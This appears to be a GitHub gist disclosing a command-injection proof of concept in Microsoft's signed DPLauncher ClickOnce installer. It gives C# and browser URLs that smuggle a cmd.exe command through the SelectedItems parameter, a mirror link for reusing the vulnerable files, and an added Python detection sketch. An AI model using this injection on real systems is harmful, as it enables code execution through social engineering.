Command injection in MS' One Step / DPLauncher / "Get ready for the Internet" application, for UAC / RCE through social engineering using MS signed exe / clickonce.
using System;
using System.Runtime.InteropServices;

class DPPwned {
    [DllImport("dfshim.dll")]
    public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl, int data, int flags);

    public static void Main() {
        LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+", 0, 0);
    }
}
iexplore https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+
Also works in Edge!
Mirror of the files: http://lucasm.cf/?zmnlz
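
A detection sketch for the pattern in the PoC above, added here as an example and not part of the original gist: it scans web-proxy log lines for ClickOnce `.application` URLs whose query parameters decode to a double quote, a shell metacharacter or an embedded switch, as the `SelectedItems` value does. The character set, the switch pattern, the function names and the log format are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Heuristics (assumptions of this example, tune for your environment):
# characters that can close a quoted argument or chain commands ...
METACHARS = re.compile(r'["&|<>^`]')
# ... and a value that smuggles in its own switch, such as ' /C:' in the PoC.
SWITCH = re.compile(r'(?:^|\s)[/-][A-Za-z]+[:=]')
URL = re.compile(r'https?://\S+')

def check_url(url):
    """Return [(param, decoded_value, reasons)] for a .application URL, else []."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(".application"):
        return []
    findings = []
    # parse_qsl percent-decodes and turns '+' into a space, which is the
    # form in which the value reaches the activated application.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        reasons = []
        if METACHARS.search(value):
            reasons.append("shell-metacharacter")
        if SWITCH.search(value):
            reasons.append("embedded-switch")
        if reasons:
            findings.append((name, value, reasons))
    return findings

def scan_log(lines):
    """Return [(line_no, param, decoded_value, reasons)] over log lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        for url in URL.findall(line):
            for name, value, reasons in check_url(url):
                hits.append((n, name, value, reasons))
    return hits

# Constructed proxy-log lines. The first URL is the one from the gist;
# the hosts, timestamps and addresses in the others are placeholders.
SAMPLE_LOG = [
    "2016-10-20T10:01:02Z 10.0.0.5 GET https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+ 200",
    "2016-10-20T10:01:09Z 10.0.0.7 GET https://example.invalid/tools/Setup.application?SelectedItems=ItemA 200",
    "2016-10-20T10:01:15Z 10.0.0.9 GET https://example.invalid/search?q=%22quoted%22 200",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Only the first sample line is reported; the quoted search query on the third line is ignored because its path is not a `.application` deployment manifest.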
@Wack0

Owner Author

commented Oct 22, 2016

Please note that the version of DPLauncher on onestepfreinstaller.blob.core.windows.net has now been fixed. Exploitation will now require hosting the files yourself. Here's a mirror of the old version: http://lucasm.cf/?zmnlz
